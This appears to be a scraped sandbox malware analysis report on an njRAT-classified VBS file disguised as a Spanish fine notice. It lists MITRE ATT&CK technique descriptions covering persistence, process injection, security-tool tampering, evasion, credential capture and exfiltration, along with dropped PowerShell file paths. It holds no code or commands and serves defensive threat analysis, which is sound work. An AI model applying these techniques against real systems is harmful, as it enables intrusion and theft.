Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Oficio notificacion multas y sanciones.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Njrat

Yara Signatures

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1

C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2yfh01gy.ai5.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3tztvill.0jl.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cxgckrry.o3r.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d2w31zvg.f1g.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dcu2olee.gyi.psm1

Windows Analysis Report
Oficio notificacion multas y sanciones.vbs

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Tactics:	Exfiltration
Data Sources:	Application Log: Application Log Content, Cloud Storage: Cloud Storage Access, Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre